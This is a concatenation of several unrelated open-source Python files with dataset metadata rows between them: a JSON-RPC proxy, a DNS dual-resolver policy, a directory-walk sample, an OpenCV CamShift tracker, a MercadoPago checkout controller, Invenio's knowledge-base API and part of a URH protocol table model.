- sends Basic HTTP authentication headers
- parses all JSON numbers that look like floats as Decimal
- uses standard Python json lib
Previous copyright, from python-jsonrpc/jsonrpc/proxy.py:
Copyright (c) 2007 Jan-Klaas Kollhof
This file is part of jsonrpc.
jsonrpc is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
This software is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this software; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
try:
import http.client as httplib
except ImportError:
import httplib
import base64
import json
import decimal
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
USER_AGENT = "AuthServiceProxy/0.1"
HTTP_TIMEOUT = 30
class JSONRPCException(Exception):
def __init__(self, rpcError):
Exception.__init__(self)
self.error = rpcError
class AuthServiceProxy(object):
def __init__(self, serviceURL, serviceName=None):
self.__serviceURL = serviceURL
self.__serviceName = serviceName
self.__url = urlparse.urlparse(serviceURL)
if self.__url.port is None:
port = 80
else:
port = self.__url.port
self.__idcnt = 0
authpair = "%s:%s" % (self.__url.username, self.__url.password)
authpair = authpair.encode('utf8')
self.__authhdr = "Basic ".encode('utf8') + base64.b64encode(authpair)
if self.__url.scheme == 'https':
self.__conn = httplib.HTTPSConnection(self.__url.hostname, port, None, None,False,
HTTP_TIMEOUT)
else:
self.__conn = httplib.HTTPConnection(self.__url.hostname, port, False,
HTTP_TIMEOUT)
def __getattr__(self, name):
        if self.__serviceName is not None:
name = "%s.%s" % (self.__serviceName, name)
return AuthServiceProxy(self.__serviceURL, name)
def __call__(self, *args):
self.__idcnt += 1
postdata = json.dumps({
'version': '1.1',
'method': self.__serviceName,
'params': args,
'id': self.__idcnt})
self.__conn.request('POST', self.__url.path, postdata,
{ 'Host' : self.__url.hostname,
'User-Agent' : USER_AGENT,
'Authorization' : self.__authhdr,
'Content-type' : 'application/json' })
httpresp = self.__conn.getresponse()
if httpresp is None:
raise JSONRPCException({
'code' : -342, 'message' : 'missing HTTP response from server'})
resp = httpresp.read()
resp = resp.decode('utf8')
resp = json.loads(resp)
        if resp['error'] is not None:
raise JSONRPCException(resp['error'])
elif 'result' not in resp:
raise JSONRPCException({
'code' : -343, 'message' : 'missing JSON-RPC result'})
else:
return resp['result']
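# Usage sketch: the URL, credentials and the "getinfo" RPC method below are
# placeholders for whatever JSON-RPC service is actually being proxied.
def _example_call():
    proxy = AuthServiceProxy("http://user:password@127.0.0.1:8332")
    return proxy.getinfo()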
| gpl-3.0 | 3,396,568,396,845,373,400 | 33.539823 | 94 | 0.607994 | false | 4.279605 | false | false | false |
account-login/dnsagent | dnsagent/resolver/dual.py | 1 | 1713 | from typing import Mapping, Union, Sequence
from twisted.names.error import ResolverError
from twisted.python.failure import Failure
from dnsagent.resolver.cn import CnResolver
from dnsagent.resolver.parallel import PoliciedParallelResolver, BaseParalledResolverPolicy
__all__ = ('DualResolver',)
class PolicyError(ResolverError):
pass
class NoSuchRule(PolicyError):
pass
class SuccessFailStatePolicy(BaseParalledResolverPolicy):
SUCC = 'S'
FAIL = 'F'
WAIT = 'W'
def __init__(self, rules: Mapping[Sequence[str], Union[str, int]]):
super().__init__()
self.rules = rules
def _convert(self, result):
if result is None:
return self.WAIT
elif isinstance(result, Failure):
return self.FAIL
else:
return self.SUCC
def for_results(self, results: Sequence):
states = tuple(self._convert(x) for x in results)
try:
action = self.rules[states]
except KeyError:
raise NoSuchRule(states)
if action == self.FAIL:
raise PolicyError
elif action == self.WAIT:
return None
else:
assert isinstance(action, int)
return action
_cn_ab_policy = SuccessFailStatePolicy({
# Cn Ab
('W', 'W'): 'W',
('W', 'S'): 'W',
('W', 'F'): 'W',
('S', 'W'): 0,
('S', 'S'): 0,
('S', 'F'): 0,
('F', 'W'): 'W',
('F', 'S'): 1,
('F', 'F'): 'F',
})
class DualResolver(PoliciedParallelResolver):
def __init__(self, cn_resolver, ab_resolver, policy=_cn_ab_policy):
resolvers = [ CnResolver(cn_resolver), ab_resolver ]
super().__init__(resolvers, policy)
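# Illustrative check of the policy table above: while the China-filtered
# resolver is still pending the policy keeps waiting even though the
# fallback already answered; once the China-filtered resolver fails, the
# fallback's answer (index 1) is picked.
def _example_policy_decision():
    pending, answered = None, object()      # stand-ins for query results
    assert _cn_ab_policy.for_results([pending, answered]) is None
    failed = Failure(Exception('blocked'))
    assert _cn_ab_policy.for_results([failed, answered]) == 1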
| mit | -6,318,335,503,835,662,000 | 23.126761 | 91 | 0.582604 | false | 3.69181 | false | false | false |
jzinner/utils | samples/python_samples/filewalk.py | 1 | 1158 | #/usr/bin/python
# import os for the os.walk() function
# os.walk returns a list of tuples: 3-tuple (dirpath, dirnames, filenames)
import os
import sys
def ParseArgs():
Error1 = """ # USAGE #
# filesystemWalk.py [directory]
# filesystemWalk.py /Users/mcohoon/Devel/PythonPractice """
if len(sys.argv) != 2:
print Error1
    elif not os.path.isdir(sys.argv[1]):
print Error1
else:
start = sys.argv[1]
filesystemWalk(start)
def filesystemWalk(start):
path = os.path.abspath(start)
print "path = " +path
for dirpath, dirnames, filenames in os.walk(path):
print "Found the initial directory " + dirpath
for file in filenames:
print "Found the file ", os.path.join(dirpath, file)
for dir in dirnames:
print "Found the directory ", os.path.join(dirpath, dir)
ParseArgs()
#start = "/Users/mcohoon/Devel/PythonPractice"
#start = "."
#filesystemWalk(start)
#os.path to take a string and make it into a full directory path
#os.walk gives you the path to the directory as the first value in the loop
#use os.path.join() to create full filename:
| mit | -6,329,629,763,930,400,000 | 28.692308 | 75 | 0.659758 | false | 3.487952 | false | false | false |
sciencefreak500/Open_Intelligence | Python/Eyesight/camshift_test.py | 1 | 1347 | import numpy as np
import cv2
cap = cv2.VideoCapture(0)
# take first frame of the video
ret,frame = cap.read()
# setup initial location of window
r,h,c,w = 250,90,400,125 # simply hardcoded the values
track_window = (c,r,w,h)
# set up the ROI for tracking
roi = frame[r:r+h, c:c+w]
hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv_roi, np.array((0., 60.,32.)), np.array((180.,255.,255.)))
roi_hist = cv2.calcHist([hsv_roi],[0],mask,[180],[0,180])
cv2.normalize(roi_hist,roi_hist,0,255,cv2.NORM_MINMAX)
# Setup the termination criteria, either 10 iteration or move by atleast 1 pt
term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1 )
while(1):
ret ,frame = cap.read()
if ret == True:
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
dst = cv2.calcBackProject([hsv],[0],roi_hist,[0,180],1)
# apply meanshift to get the new location
ret, track_window = cv2.CamShift(dst, track_window, term_crit)
# Draw it on image
pts = cv2.boxPoints(ret)
pts = np.int0(pts)
img2 = cv2.polylines(frame,[pts],True, 255,2)
        cv2.imshow('img2',img2)
k = cv2.waitKey(60) & 0xff
if k == 27:
break
else:
cv2.imwrite(chr(k)+".jpg",img2)
else:
break
cv2.destroyAllWindows()
cap.release()
| gpl-2.0 | -696,926,444,738,673,900 | 26.489796 | 80 | 0.620638 | false | 2.699399 | false | false | false |
reingart/suscripciones | controllers/checkout.py | 1 | 1037 | # coding: utf8
# try something like
def index():
form = SQLFORM.factory(
Field("descripcion", "string", default="Barrilete multicolor"),
Field("cantidad", "integer", default=1),
Field("precio", "float", default=1.00),
)
if form.accepts(request.vars, session):
preference_data = {
"items": [
{
"title": form.vars.descripcion,
"quantity": int(form.vars.cantidad),
"currency_id": "ARS",
"unit_price": float(form.vars.precio),
}
]
}
preference = mp.create_preference(preference_data)
#return str(preference)
return """<!DOCTYPE html>
<html>
<head>
<title>Pagar</title>
</head>
<body>
<a href="%s">Pagar</a>
</body>
</html>""" % preference['response']['init_point']
else:
response.view = "generic.html"
return {'form': form}
| agpl-3.0 | -8,104,248,428,180,297,000 | 27.027027 | 71 | 0.47541 | false | 4.035019 | false | false | false |
egabancho/invenio | invenio/modules/knowledge/api.py | 1 | 26116 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011, 2013, 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Provide API-callable functions for knowledge base management."""
import json
import os
import re
import warnings
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import NoResultFound
from invenio.base.globals import cfg
from invenio.ext.sqlalchemy import db
from invenio.ext.sqlalchemy.utils import session_manager
from invenio.modules.search.models import Collection
from invenio.utils.memoise import Memoise
from . import models
processor_type = 0
try:
from lxml import etree
processor_type = 1
except ImportError:
try:
import libxml2
import libxslt
processor_type = 2
except ImportError:
pass
def get_kb_by_id(kb_id):
"""Return the knwKB object with given id.
:raises: :exc:`~sqlalchemy.orm.exc.NoResultFound` in case not exist.
"""
return models.KnwKB.query.filter_by(id=kb_id).one()
def get_kb_id(kb_name):
"""Get the id by name.
:param kb_name: knowledge base name
"""
warnings.warn("The method get_kb_id(kb_name) is deprecated! "
"Use instead get_kb_by_id()'",
DeprecationWarning)
return get_kb_by_id(kb_name).id
def get_kb_by_name(kb_name):
"""Return the knwKB object with given name.
:raises: :exc:`~sqlalchemy.orm.exc.NoResultFound` in case not exist.
"""
return models.KnwKB.query.filter_by(name=kb_name).one()
def get_all_kb_names():
"""Return all knowledge base names.
:return: list of names
"""
return [row.name for row in models.KnwKB.query.all()]
get_kb_by_name_memoised = Memoise(get_kb_by_name)
def query_kb_mappings(kbid, sortby="to", key="", value="",
match_type="s"):
"""Return a list of all mappings from the given kb, ordered by key.
If key given, give only those with left side (mapFrom) = key.
If value given, give only those with right side (mapTo) = value.
:param kb_name: knowledge base name. if "", return all
:param sortby: the sorting criteria ('from' or 'to')
:param key: return only entries where key matches this
:param value: return only entries where value matches this
:param match_type: s=substring, e=exact, sw=startswith
"""
return models.KnwKBRVAL.query_kb_mappings(kbid, sortby, key,
value, match_type)
def get_kb_mappings(kb_name="", key="", value="", match_type="s", sortby="to",
limit=None):
"""Return a list of all mappings from the given kb, ordered by key.
If key given, give only those with left side (mapFrom) = key.
If value given, give only those with right side (mapTo) = value.
:param kb_name: knowledge base name. if "", return all
:param sortby: the sorting criteria ('from' or 'to')
:param key: return only entries where key matches this
:param value: return only entries where value matches this
    :param limit: return at most this number of entries
"""
# query
query = db.session.query(models.KnwKBRVAL).join(models.KnwKB)
# filter
if kb_name:
query = query.filter(models.KnwKB.name == kb_name)
if len(key) > 0:
if match_type == "s":
key = "%"+key+"%"
else:
key = '%'
if len(value) > 0:
if match_type == "s":
value = "%"+value+"%"
else:
value = '%'
query = query.filter(
models.KnwKBRVAL.m_key.like(key),
models.KnwKBRVAL.m_value.like(value))
# order by
if sortby == "from":
query = query.order_by(models.KnwKBRVAL.m_key)
else:
query = query.order_by(models.KnwKBRVAL.m_value)
if limit:
query = query.limit(limit)
# return results
return [kbv.to_dict() for (kbv) in query.all()]
def get_kb_mapping(kb_name="", key="", value="", match_type="e", default="",
limit=None):
"""Get one unique mapping. If not found, return default.
:param kb_name: the name of the kb
:param key: include only lines matching this on left side in the results
:param value: include only lines matching this on right side in the results
:param match_type: s = substring match, e = exact match
:param default: default value if no mapping is found
:return: a mapping
"""
mappings = get_kb_mappings(kb_name, key=key, value=value,
match_type=match_type, limit=limit)
if len(mappings) == 0:
return default
else:
return mappings[0]
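# Usage sketch for the two lookup helpers above; the kb name and search
# terms are hypothetical.
def _example_kb_lookups():
    # exact match on the left-hand side, with a default fallback
    mapping = get_kb_mapping('EJOURNALS', key='Phys. Rev. D', default='')
    # substring match on the right-hand side, at most five rows
    rows = get_kb_mappings('EJOURNALS', value='Review', match_type='s',
                           limit=5)
    return mapping, rows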
@session_manager
def add_kb_mapping(kb_name, key, value=""):
"""Add a new mapping to given kb.
:param kb_name: the name of the kb where to insert the new value
:param key: the key of the mapping
:param value: the value of the mapping
"""
kb = get_kb_by_name(kb_name)
if key in kb.kbrvals:
# update
kb.kbrvals[key].m_value = value
else:
# insert
kb.kbrvals.set(models.KnwKBRVAL(m_key=key, m_value=value))
@session_manager
def remove_kb_mapping(kb_name, key):
"""Delete an existing kb mapping in kb.
:param kb_name: the name of the kb where to insert the new value
:param key: the key of the mapping
"""
kb = get_kb_by_name(kb_name)
del kb.kbrvals[key]
def update_kb_mapping(kb_name, old_key, key, value):
"""Update an existing kb mapping with key old_key with a new key and value.
:param kb_name: the name of the kb where to insert the new value
:param old_key: the key of the mapping in the kb
:param key: the new key of the mapping
:param value: the new value of the mapping
"""
db.session.query(models.KnwKBRVAL).join(models.KnwKB) \
.filter(models.KnwKB.name == kb_name,
models.KnwKBRVAL.m_key == old_key) \
.update({"m_key": key, "m_value": value})
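# Round-trip sketch for the three mapping helpers above; the kb is assumed
# to exist already and the key/value pairs are hypothetical.
def _example_mapping_roundtrip():
    add_kb_mapping('WEBLINKS', 'SPIRES', 'http://www.slac.stanford.edu/spires/')
    update_kb_mapping('WEBLINKS', 'SPIRES', 'INSPIRE', 'http://inspirehep.net/')
    remove_kb_mapping('WEBLINKS', 'INSPIRE')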
def get_kb_mappings_json(kb_name="", key="", value="", match_type="s",
limit=None):
"""Get leftside/rightside mappings from kb kb_name formatted as json dict.
If key given, give only those with left side (mapFrom) = key.
If value given, give only those with right side (mapTo) = value.
:param kb_name: the name of the kb
:param key: include only lines matching this on left side in the results
:param value: include only lines matching this on right side in the results
:param match_type: s = substring match, e = exact match
:param limit: maximum number of results to return (are ALL if set to None)
:return: a list of mappings
"""
mappings = get_kb_mappings(kb_name, key, value, match_type)
ret = []
if limit is None:
limit = len(mappings)
for m in mappings[:limit]:
label = m['value'] or m['key']
value = m['key'] or m['value']
ret.append({'label': label, 'value': value})
return json.dumps(ret)
def get_kb_mappings_embedded_json(kb_name="", key="", value="",
match_type="s", limit=None):
"""Get leftside/rightside mappings from kb kb_name formatted as json dict.
The rightside is actually considered as a json string and hence embedded
within the final result.
If key given, give only those with left side (mapFrom) = key.
If value given, give only those with right side (mapTo) = value.
:param kb_name: the name of the kb
:param key: include only lines matching this on left side in the results
:param value: include only lines matching this on right side in the results
:param match_type: s = substring match, e = exact match
:param limit: maximum number of results to return (are ALL if set to None)
:return: a list of mappings
"""
mappings = get_kb_mappings(kb_name, key, value, match_type)
ret = []
if limit is None:
limit = len(mappings)
for m in mappings[:limit]:
label = m['value'] or m['key']
value = m['key'] or m['value']
ret.append({'label': label, 'value': json.loads(value)})
return json.dumps(ret)
def kb_exists(kb_name):
"""Return True if a kb with the given name exists.
:param kb_name: the name of the knowledge base
"""
return db.session.query(
models.KnwKB.query.filter(
models.KnwKB.name.like(kb_name)).exists()).scalar()
def get_kb_name(kb_id):
"""Return the name of the kb given by id.
:param kb_id: the id of the knowledge base
"""
return get_kb_by_id(kb_id).name
@session_manager
def update_kb_attributes(kb_name, new_name, new_description=''):
"""Update kb kb_name with a new name and (optionally) description.
:param kb_name: the name of the kb to update
:param new_name: the new name for the kb
:param new_description: the new description for the kb
"""
models.KnwKB.query.filter_by(name=kb_name) \
.update({"name": new_name, "description": new_description})
def add_kb(kb_name="Untitled", kb_type=None, tries=10):
"""Add a new kb in database, return the id.
Add a new kb in database, and returns its id
The name of the kb will be 'Untitled#'
such that it is unique.
:param kb_name: the name of the kb
:param kb_type: the type of the kb, incl 'taxonomy' and 'dynamic'.
None for typical (leftside-rightside).
:param tries: exit after <n> retry
:return: the id of the newly created kb
"""
created = False
name = kb_name
i = 0
while(i < tries and created is False):
try:
kb = models.KnwKB(name=name, description="", kbtype=kb_type)
created = True
db.session.add(kb)
db.session.commit()
except IntegrityError:
db.session.rollback()
# get the highest id to calculate the new name
result = db.session.execute(
db.select([models.KnwKB.id])
.order_by(db.desc(models.KnwKB.id))
.limit(1)).first()
index = result[0] + 1 if result is not None else 1
name = kb_name + " " + str(index)
i = i + 1
created = False
except:
db.session.rollback()
raise
if created is False:
# TODO raise the right exception
raise Exception("Can't create kb \"{0}\".\n" +
"Probabily the server is busy! " +
"Try again later.".format(kb_name))
return kb.id
def add_dynamic_kb(kbname, tag, collection="", searchwith=""):
"""A convenience method."""
kb_id = add_kb(kb_name=kbname, kb_type='dynamic')
save_kb_dyn_config(kb_id, tag, searchwith, collection)
return kb_id
def save_kb_dyn_config(kb_id, field, expression, collection=None):
"""Save a dynamic knowledge base configuration.
:param kb_id: the id
:param field: the field where values are extracted
:param expression: ..using this expression
:param collection: ..in a certain collection (default is all)
"""
# check that collection exists
if collection:
collection = Collection.query.filter_by(name=collection).one()
kb = get_kb_by_id(kb_id)
kb.set_dyn_config(field, expression, collection)
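# Sketch: create a dynamic kb whose values are harvested from a record
# field. The kb name, field tag and search expression are assumptions.
def _example_dynamic_kb():
    return add_dynamic_kb('JOURNALNAMES', '711__a', searchwith='%')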
def kb_mapping_exists(kb_name, key):
"""Return the information if a mapping exists.
:param kb_name: knowledge base name
:param key: left side (mapFrom)
"""
try:
kb = get_kb_by_name(kb_name)
except NoResultFound:
return False
return key in kb.kbrvals
@session_manager
def delete_kb(kb_name):
"""Delete given kb from database.
:param kb_name: knowledge base name
"""
db.session.delete(models.KnwKB.query.filter_by(
name=kb_name).one())
# Knowledge Bases Dependencies
##
def get_elements_that_use_kb(name):
# FIXME remove the obsolete function
"""Return a list of elements that call given kb.
WARNING: this routine is obsolete.
[ {'filename':"filename_1.py"
'name': "a name"
},
...
]
:return: elements sorted by name
"""
warnings.warn("The method 'get_elements_that_use_kb(name) is obsolete!'",
DeprecationWarning)
format_elements = {}
# Retrieve all elements in files
from invenio.modules.formatter.engine \
import TEMPLATE_CONTEXT_FUNCTIONS_CACHE
for element in TEMPLATE_CONTEXT_FUNCTIONS_CACHE \
.bibformat_elements().values():
path = element.__file__
filename = os.path.basename(element.__file__)
if filename.endswith(".py"):
formatf = open(path, 'r')
code = formatf.read()
formatf.close()
# Search for use of kb inside code
kb_pattern = re.compile('''
(bfo.kb)\s* #Function call
\(\s* #Opening parenthesis
[\'"]+ #Single or double quote
(?P<kb>%s) #kb
[\'"]+\s* #Single or double quote
, #comma
''' % name, re.VERBOSE | re.MULTILINE | re.IGNORECASE)
result = kb_pattern.search(code)
if result is not None:
name = ("".join(filename.split(".")[:-1])).lower()
if name.startswith("bfe_"):
name = name[4:]
format_elements[name] = {'filename': filename,
'name': name}
keys = format_elements.keys()
keys.sort()
return map(format_elements.get, keys)
### kb functions for export
def get_kbs_info(kbtype="", searchkbname=""):
"""A convenience method.
:param kbtype: type of kb -- get only kb's of this type
:param searchkbname: get only kb's where this sting appears in the name
"""
# query + order by
query = models.KnwKB.query.order_by(
models.KnwKB.name)
# filters
if kbtype:
query = query.filter_by(kbtype=kbtype)
if searchkbname:
query = query.filter_by(name=searchkbname)
return [row.to_dict() for row in query.all()]
def get_kba_values(kb_name, searchname="", searchtype="s"):
"""Return an array of values "authority file" type = just values.
:param kb_name: name of kb
:param searchname: get these values, according to searchtype
    :param searchtype: s=substring, e=exact, sw=startswith
"""
if searchtype == 's' and searchname:
searchname = '%'+searchname+'%'
if searchtype == 'sw' and searchname: # startswith
searchname = searchname+'%'
if not searchname:
searchname = '%'
query = db.session.query(models.KnwKBRVAL).join(models.KnwKB) \
.filter(models.KnwKBRVAL.m_value.like(searchname),
models.KnwKB.name.like(kb_name))
return [(k.m_value,) for k in query.all()]
def get_kbr_keys(kb_name, searchkey="", searchvalue="", searchtype='s'):
"""Return an array of keys.
:param kb_name: the name of the knowledge base
:param searchkey: search using this key
:param searchvalue: search using this value
:param searchtype: s = substring, e=exact
"""
if searchtype == 's' and searchkey:
searchkey = '%'+searchkey+'%'
if searchtype == 's' and searchvalue:
searchvalue = '%'+searchvalue+'%'
if searchtype == 'sw' and searchvalue: # startswith
searchvalue = searchvalue+'%'
if not searchvalue:
searchvalue = '%'
if not searchkey:
searchkey = '%'
query = db.session.query(models.KnwKBRVAL).join(models.KnwKB) \
.filter(models.KnwKBRVAL.m_key.like(searchkey),
models.KnwKBRVAL.m_value.like(searchvalue),
models.KnwKB.name.like(kb_name))
return [(k.m_key,) for k in query.all()]
def get_kbr_values(kb_name, searchkey="", searchvalue="", searchtype='s',
use_memoise=False):
"""Return a tuple of values from key-value mapping kb.
:param kb_name: the name of the knowledge base
:param searchkey: search using this key
:param searchvalue: search using this value
:param searchtype: s=substring; e=exact
:param use_memoise: can we memoise while doing lookups?
:type use_memoise: bool
"""
try:
if use_memoise:
kb = get_kb_by_name_memoised(kb_name)
else:
kb = get_kb_by_name(kb_name)
except NoResultFound:
return []
return list(kb.get_kbr_values(searchkey, searchvalue, searchtype))
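# Illustrative sketch (not part of the original module): how the key/value
# lookup helpers above could be combined. The kb name 'JOURNALS' and the
# search terms are hypothetical placeholders, not values shipped with Invenio.
def _example_kbr_lookup():
    """Hypothetical usage of get_kbr_values and get_kbr_keys."""
    # exact lookup: every value mapped from the key 'Phys Rev D'
    values = get_kbr_values('JOURNALS', searchkey='Phys Rev D', searchtype='e')
    # substring search: every key containing 'Phys'
    keys = get_kbr_keys('JOURNALS', searchkey='Phys', searchtype='s')
    return values, keys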
def get_kbr_items(kb_name, searchkey="", searchvalue="", searchtype='s'):
"""Return a list of dictionaries that match the search.
:param kb_name: the name of the knowledge base
:param searchkey: search using this key
:param searchvalue: search using this value
:param searchtype: s = substring, e=exact
:return a list of dictionaries [{'key'=>x, 'value'=>y},..]
"""
kb = get_kb_by_name(kb_name)
return kb.get_kbr_items(searchkey, searchvalue, searchtype)
def get_kbd_values(kbname, searchwith=""):
"""Return a list of values by searching a dynamic kb.
:param kbname: name of the knowledge base
:param searchwith: a term to search with
"""
from invenio.legacy import search_engine
# first check that the kb in question is dynamic
kb = get_kb_by_name(kbname)
kbid = kb.id
if not kbid:
return []
kbtype = kb.kbtype
if not kbtype:
return []
if kbtype != 'd':
return []
# get the configuration so that we see what the field is
confdict = kb.kbdefs.to_dict()
if not confdict:
return []
if 'field' not in confdict:
return []
field = confdict['field']
expression = confdict['expression']
collection = ""
if 'collection' in confdict:
collection = confdict['collection']
reclist = [] # return this
if searchwith and expression:
if (expression.count('%') > 0):
expression = expression.replace("%", searchwith)
reclist = search_engine.perform_request_search(p=expression,
cc=collection)
else:
# no %.. just make a combination
expression = expression + " and " + searchwith
reclist = search_engine.perform_request_search(p=expression,
cc=collection)
else: # either no expr or no searchwith.. but never mind about searchwith
if expression: # in this case: only expression
reclist = search_engine.perform_request_search(p=expression,
cc=collection)
else:
# make a fake expression so that only records that have this field
# will be returned
fake_exp = "/.*/"
if searchwith:
fake_exp = searchwith
reclist = search_engine.perform_request_search(f=field, p=fake_exp,
cc=collection)
if reclist:
return [val for (val, dummy) in
search_engine.get_most_popular_field_values(reclist, field)]
return [] # in case nothing worked
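# Illustrative sketch (not part of the original module): wiring a dynamic kb
# lookup end to end. The kb name, MARC tag and collection are hypothetical;
# real results depend on the records indexed in the running instance.
def _example_dynamic_kb_lookup():
    """Hypothetical usage of add_dynamic_kb together with get_kbd_values."""
    kb_id = add_dynamic_kb('authors_kb', '100__a', collection='Articles')
    kb_name = get_kb_name(kb_id)
    # most popular 100__a values among records matching 'Ellis'
    return get_kbd_values(kb_name, searchwith='Ellis')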
def get_kbd_values_json(kbname, searchwith=""):
"""Return values from searching a dynamic kb as a json-formatted string.
This IS probably the method you want.
:param kbname: name of the knowledge base
:param searchwith: a term to search with
"""
res = get_kbd_values(kbname, searchwith)
return json.dumps(res)
def get_kbd_values_for_bibedit(tag, collection="", searchwith="",
expression=""):
"""Dynamically create a dynamic KB for a specific search; then destroy it.
This probably isn't the method you want.
Example1: tag=100__a : return values of 100__a
Example2: tag=100__a, searchwith=Jill: return values of 100__a that match
with Jill
    Example3: tag=100__a, searchwith=Ellis, expression="700__a:*%*":
return values of 100__a for which Ellis matches some 700__a
    Note: the performance of this function is ok compared to a plain
    perform_request_search / get most popular fields -pair.
    The overhead is about 5% with large record sets;
    the lookups are the expensive part.
:param tag: the tag like 100__a
:param collection: collection id
:param searchwith: the string to search. If empty, match all.
:param expression: the search expression for perform_request_search;
       if present, '%' is substituted with /searchwith/.
If absent, /searchwith/ is searched for in /tag/.
"""
dkbname = "tmp_dynamic_"+tag+'_'+expression
kb_id = add_kb(kb_name=dkbname, kb_type='dynamic')
# get the kb name since it may be catenated by a number
# in case there are concurrent calls.
kb_name = get_kb_name(kb_id)
add_kb_mapping(kb_name, tag, expression, collection)
# now, get stuff
myvalues = get_kbd_values(kb_name, searchwith)
# the tmp dyn kb is now useless, delete it
delete_kb(kb_name)
return myvalues
def get_kbt_items(taxonomyfilename, templatefilename, searchwith=""):
"""
Get items from taxonomy file using a templatefile.
If searchwith is defined, return only items that match with it.
:param taxonomyfilename: full path+name of the RDF file
    :param templatefilename: full path+name of the XSLT file
:param searchwith: a term to search with
"""
if processor_type == 1:
# lxml
doc = etree.XML(taxonomyfilename)
styledoc = etree.XML(templatefilename)
style = etree.XSLT(styledoc)
result = style(doc)
strres = str(result)
del result
del style
del styledoc
del doc
elif processor_type == 2:
# libxml2 & libxslt
styledoc = libxml2.parseFile(templatefilename)
style = libxslt.parseStylesheetDoc(styledoc)
doc = libxml2.parseFile(taxonomyfilename)
result = style.applyStylesheet(doc, None)
strres = style.saveResultToString(result)
style.freeStylesheet()
doc.freeDoc()
result.freeDoc()
else:
# no xml parser found
strres = ""
ritems = []
if len(strres) == 0:
return []
else:
lines = strres.split("\n")
for line in lines:
if searchwith:
if line.count(searchwith) > 0:
ritems.append(line)
else:
if len(line) > 0:
ritems.append(line)
return ritems
def get_kbt_items_for_bibedit(kbtname, tag="", searchwith=""):
"""A simplifield, customized version of the function get_kbt_items.
Traverses an RDF document. By default returns all leaves. If
tag defined returns the content of that tag.
If searchwith defined, returns leaves that match it.
Warning! In order to make this faster, the matching field values
cannot be multi-line!
:param kbtname: name of the taxonony kb
    :param tag: name of the tag whose content to return
:param searchwith: a term to search with
"""
# get the actual file based on the kbt name
kb = get_kb_by_name(kbtname)
kb_id = kb.id
if not kb_id:
return []
# get the rdf file..
rdfname = cfg['CFG_WEBDIR'] + "/kbfiles/" + str(kb_id) + ".rdf"
if not os.path.exists(rdfname):
return []
xsl = """\
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<xsl:output method="xml" standalone="yes"
omit-xml-declaration="yes" indent="no"/>
<xsl:template match="rdf:RDF">
<foo><!--just having some tag here speeds up output by 10x-->
<xsl:apply-templates />
</foo>
</xsl:template>
<xsl:template match="*">
<!--hi><xsl:value-of select="local-name()"/></hi-->
<xsl:if test="local-name()='"""+tag+"""'">
<myout><xsl:value-of select="normalize-space(.)"/></myout>
</xsl:if>
<!--traverse down in tree!-->
<xsl:text>
</xsl:text>
<xsl:apply-templates />
</xsl:template>
</xsl:stylesheet>"""
if processor_type == 1:
styledoc = etree.XML(xsl)
style = etree.XSLT(styledoc)
doc = etree.parse(open(rdfname, 'r'))
strres = str(style(doc))
elif processor_type == 2:
styledoc = libxml2.parseDoc(xsl)
style = libxslt.parseStylesheetDoc(styledoc)
doc = libxml2.parseFile(rdfname)
result = style.applyStylesheet(doc, None)
strres = style.saveResultToString(result)
style.freeStylesheet()
doc.freeDoc()
result.freeDoc()
else:
# no xml parser found
strres = ""
ritems = []
if len(strres) == 0:
return []
else:
lines = strres.split("\n")
for line in lines:
# take only those with myout..
if line.count("<myout>") > 0:
# remove the myout tag..
line = line[9:]
line = line[:-8]
if searchwith:
if line.count(searchwith) > 0:
ritems.append(line)
else:
ritems.append(line)
return ritems
if __name__ == "__main__":
pass
| gpl-2.0 | -6,103,226,367,035,997,000 | 32.142132 | 79 | 0.607559 | false | 3.753377 | false | false | false |
jopohl/urh | src/urh/models/ProtocolTableModel.py | 1 | 2539 | from collections import defaultdict
from PyQt5.QtCore import pyqtSignal, QModelIndex, Qt
from urh import settings
from urh.models.TableModel import TableModel
from urh.signalprocessing.ProtocolAnalyzer import ProtocolAnalyzer
from urh.ui.actions.DeleteBitsAndPauses import DeleteBitsAndPauses
class ProtocolTableModel(TableModel):
ref_index_changed = pyqtSignal(int)
def __init__(self, proto_analyzer: ProtocolAnalyzer, participants, controller, parent=None):
super().__init__(participants=participants, parent=parent)
self.controller = controller # type: urh.controller.CompareFrameController.CompareFrameController
self.protocol = proto_analyzer
self.active_group_ids = [0]
@property
def diff_columns(self) -> defaultdict(set):
return self._diffs
@property
def refindex(self):
return self._refindex
@refindex.setter
def refindex(self, refindex):
if refindex != self._refindex:
self._refindex = refindex
self.update()
self.ref_index_changed.emit(self._refindex)
def refresh_fonts(self):
self.bold_fonts.clear()
self.text_colors.clear()
for i in self._diffs.keys():
for j in self._diffs[i]:
self.bold_fonts[i, j] = True
self.text_colors[i, j] = settings.DIFFERENCE_CELL_COLOR
if self._refindex >= 0:
for j in range(self.col_count):
self.text_colors[self._refindex, j] = settings.SELECTED_ROW_COLOR
def delete_range(self, min_row: int, max_row: int, start: int, end: int):
if not self.is_writeable:
return
del_action = DeleteBitsAndPauses(proto_analyzer=self.protocol, start_message=min_row, end_message=max_row,
